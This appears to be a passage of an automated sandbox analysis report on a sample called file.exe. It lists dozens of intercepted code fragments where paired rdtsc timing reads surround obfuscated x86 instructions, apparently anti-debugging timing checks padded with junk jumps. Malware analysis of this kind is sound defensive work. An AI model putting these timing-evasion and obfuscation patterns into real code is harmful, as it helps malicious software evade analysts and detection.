                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0441 second address: 56B04A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F08ED2F2E98h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 jmp 00007F08ED2F2E90h 0x00000017 and dword ptr [eax], 00000000h 0x0000001a pushad 0x0000001b jmp 00007F08ED2F2E8Eh 0x00000020 jmp 00007F08ED2F2E92h 0x00000025 popad 0x00000026 and dword ptr [eax+04h], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov esi, ebx 0x0000002f movsx edi, si 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56903E8 second address: 56903EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56903EC second address: 56903F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56903F2 second address: 569041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08ED2385F0h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569041E second address: 569042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569042D second address: 5690433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690433 second address: 5690437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690437 second address: 569043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569043B second address: 569047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 2AA3h 0x0000000e jmp 00007F08ED2F2E98h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F08ED2F2E97h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0E1A second address: 56A0ED5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385F7h 0x00000009 add ecx, 5ADFC81Eh 0x0000000f jmp 00007F08ED2385F9h 0x00000014 popfd 0x00000015 call 00007F08ED2385F0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ebp 0x0000001f jmp 00007F08ED2385EEh 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007F08ED2385F0h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007F08ED2385EFh 0x0000003c sbb ax, 083Eh 0x00000041 jmp 00007F08ED2385F9h 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F08ED2385EDh 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0108 second address: 56B0158 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F08ED2F2E95h 0x00000008 xor al, FFFFFFF6h 0x0000000b jmp 00007F08ED2F2E91h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F08ED2F2E8Eh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F08ED2F2E8Eh 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0158 second address: 56B01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 10357BF4h 0x00000008 mov di, 6360h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F08ED2385F5h 0x00000017 add eax, 0AE02866h 0x0000001d jmp 00007F08ED2385F1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F08ED2385F0h 0x00000029 sub cl, 00000008h 0x0000002c jmp 00007F08ED2385EBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B01C0 second address: 56B01C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B01C4 second address: 56B01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B01CA second address: 56B0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F08ED2F2E96h 0x0000000b jmp 00007F08ED2F2E95h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov dl, ch 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D073E second address: 56D0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0744 second address: 56D07B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2F2E98h 0x00000009 sbb esi, 5FF91978h 0x0000000f jmp 00007F08ED2F2E8Bh 0x00000014 popfd 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F08ED2F2E8Bh 0x00000023 mov eax, dword ptr [774365FCh] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F08ED2F2E92h 0x00000031 sbb cx, C308h 0x00000036 jmp 00007F08ED2F2E8Bh 0x0000003b popfd 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D07B2 second address: 56D07C8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 6DF9E57Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e test eax, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D07C8 second address: 56D07CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D07CC second address: 56D07E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D07E5 second address: 56D0829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2F2E93h 0x00000009 sbb cx, 415Eh 0x0000000e jmp 00007F08ED2F2E99h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F095EFD5FCEh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0829 second address: 56D0831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0831 second address: 56D0845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, 69FD6C88h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0845 second address: 56D08CC instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bh, ch 0x00000009 popad 0x0000000a xor eax, dword ptr [ebp+08h] 0x0000000d jmp 00007F08ED2385F2h 0x00000012 and ecx, 1Fh 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F08ED2385EEh 0x0000001c xor esi, 1D82C218h 0x00000022 jmp 00007F08ED2385EBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F08ED2385F8h 0x0000002e sbb ch, 00000078h 0x00000031 jmp 00007F08ED2385EBh 0x00000036 popfd 0x00000037 popad 0x00000038 ror eax, cl 0x0000003a pushad 0x0000003b jmp 00007F08ED2385F4h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D08CC second address: 56D08E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 386Dh 0x00000008 popad 0x00000009 popad 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2F2E8Fh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D08E8 second address: 56D0900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0900 second address: 56D094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00ED2014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F08F1B336D1h 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007F08ED2F2E97h 0x0000002a pop eax 0x0000002b pushad 0x0000002c mov esi, 61837F6Bh 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 ret 0x00000036 nop 0x00000037 push eax 0x00000038 call 00007F08F1B336EFh 0x0000003d mov edi, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F08ED2F2E96h 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D094A second address: 56D0971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385F5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0971 second address: 56D0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0977 second address: 56D097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D097B second address: 56D097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D097F second address: 56D09A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cl, 19h 0x0000000c movsx edi, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F08ED2385EFh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D09A1 second address: 56D09C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680019 second address: 568001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568001D second address: 5680021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680021 second address: 5680027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680027 second address: 568013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F08ED2F2E96h 0x00000014 sub eax, 6AA9B008h 0x0000001a jmp 00007F08ED2F2E8Bh 0x0000001f popfd 0x00000020 call 00007F08ED2F2E98h 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F08ED2F2E97h 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 call 00007F08ED2F2E94h 0x00000037 mov ebx, eax 0x00000039 pop esi 0x0000003a pushfd 0x0000003b jmp 00007F08ED2F2E97h 0x00000040 add eax, 3E101BBEh 0x00000046 jmp 00007F08ED2F2E99h 0x0000004b popfd 0x0000004c popad 0x0000004d and esp, FFFFFFF8h 0x00000050 pushad 0x00000051 mov cx, dx 0x00000054 popad 0x00000055 push ebp 0x00000056 jmp 00007F08ED2F2E92h 0x0000005b mov dword ptr [esp], ecx 0x0000005e pushad 0x0000005f call 00007F08ED2F2E8Eh 0x00000064 pop edx 0x00000065 jmp 00007F08ED2F2E8Eh 0x0000006a popad 0x0000006b xchg eax, ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F08ED2F2E97h 0x00000073 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568013C second address: 5680154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680154 second address: 56801B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F08ED2F2E8Ch 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 pushfd 0x00000014 jmp 00007F08ED2F2E8Ch 0x00000019 and ax, 3E38h 0x0000001e jmp 00007F08ED2F2E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 mov dh, 7Eh 0x0000002b pop esi 0x0000002c jmp 00007F08ED2F2E8Dh 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F08ED2F2E8Dh 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56801B4 second address: 56801C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1612h 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56801C7 second address: 56801CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56801CB second address: 56801D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56801D1 second address: 5680284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F08ED2F2E90h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 jmp 00007F08ED2F2E90h 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e jmp 00007F08ED2F2E93h 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 mov esi, ebx 0x00000029 call 00007F08ED2F2E91h 0x0000002e pop ecx 0x0000002f popad 0x00000030 push edx 0x00000031 jmp 00007F08ED2F2E8Ch 0x00000036 pop ecx 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 jmp 00007F08ED2F2E91h 0x0000003e test esi, esi 0x00000040 pushad 0x00000041 mov edx, esi 0x00000043 mov ah, 7Ah 0x00000045 popad 0x00000046 je 00007F095F021230h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F08ED2F2E8Ch 0x00000054 mov di, si 0x00000057 popad 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680284 second address: 5680292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680292 second address: 5680346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F08ED2F2E8Dh 0x00000016 or al, 00000026h 0x00000019 jmp 00007F08ED2F2E91h 0x0000001e popfd 0x0000001f mov edx, esi 0x00000021 popad 0x00000022 je 00007F095F0211E9h 0x00000028 pushad 0x00000029 mov ecx, edx 0x0000002b popad 0x0000002c mov edx, dword ptr [esi+44h] 0x0000002f jmp 00007F08ED2F2E91h 0x00000034 or edx, dword ptr [ebp+0Ch] 0x00000037 pushad 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b test edx, 61000000h 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F08ED2F2E8Bh 0x00000048 and esi, 15F9F1BEh 0x0000004e jmp 00007F08ED2F2E99h 0x00000053 popfd 0x00000054 mov bl, ch 0x00000056 popad 0x00000057 jne 00007F095F0211EBh 0x0000005d jmp 00007F08ED2F2E93h 0x00000062 test byte ptr [esi+48h], 00000001h 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680346 second address: 5680361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5680361 second address: 5680379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E94h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670751 second address: 5670755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670755 second address: 567075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567075B second address: 56707BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F08ED2385EEh 0x00000015 or esi, 74CA1CE8h 0x0000001b jmp 00007F08ED2385EBh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 mov ecx, edi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c jmp 00007F08ED2385EAh 0x00000031 and esp, FFFFFFF8h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F08ED2385F7h 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56707BC second address: 56707F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F08ED2F2E8Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, si 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56707F1 second address: 56707F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56707F6 second address: 5670838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 jmp 00007F08ED2F2E8Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F08ED2F2E90h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F08ED2F2E97h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670838 second address: 5670906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385EFh 0x00000009 and esi, 7702270Eh 0x0000000f jmp 00007F08ED2385F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F08ED2385F0h 0x0000001b adc esi, 796D0D88h 0x00000021 jmp 00007F08ED2385EBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a push eax 0x0000002b pushad 0x0000002c jmp 00007F08ED2385EFh 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007F08ED2385F2h 0x00000038 mov esi, dword ptr [ebp+08h] 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F08ED2385EEh 0x00000042 sbb ecx, 7D2F8248h 0x00000048 jmp 00007F08ED2385EBh 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 pushfd 0x00000051 jmp 00007F08ED2385F6h 0x00000056 and eax, 3039C4A8h 0x0000005c jmp 00007F08ED2385EBh 0x00000061 popfd 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670906 second address: 5670984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub ebx, ebx 0x0000000c jmp 00007F08ED2F2E91h 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F08ED2F2E8Ch 0x0000001a add ax, 5968h 0x0000001f jmp 00007F08ED2F2E8Bh 0x00000024 popfd 0x00000025 jmp 00007F08ED2F2E98h 0x0000002a popad 0x0000002b je 00007F095F0288A4h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F08ED2F2E8Ah 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670984 second address: 5670988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670988 second address: 567098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567098E second address: 567099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567099F second address: 5670A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 call 00007F08ED2F2E99h 0x0000001a mov edi, esi 0x0000001c pop esi 0x0000001d popad 0x0000001e mov ecx, esi 0x00000020 jmp 00007F08ED2F2E93h 0x00000025 je 00007F095F028837h 0x0000002b jmp 00007F08ED2F2E96h 0x00000030 test byte ptr [77436968h], 00000002h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F08ED2F2E97h 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670A2E second address: 5670A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F095EF6DF51h 0x0000000f pushad 0x00000010 call 00007F08ED2385ECh 0x00000015 movzx eax, bx 0x00000018 pop ebx 0x00000019 mov cx, 2D23h 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F08ED2385F5h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5670A81 second address: 5670ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F08ED2F2E8Eh 0x0000000f push eax 0x00000010 jmp 00007F08ED2F2E8Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov eax, edi 0x0000001b mov dx, B6C2h 0x0000001f popad 0x00000020 rdtsc
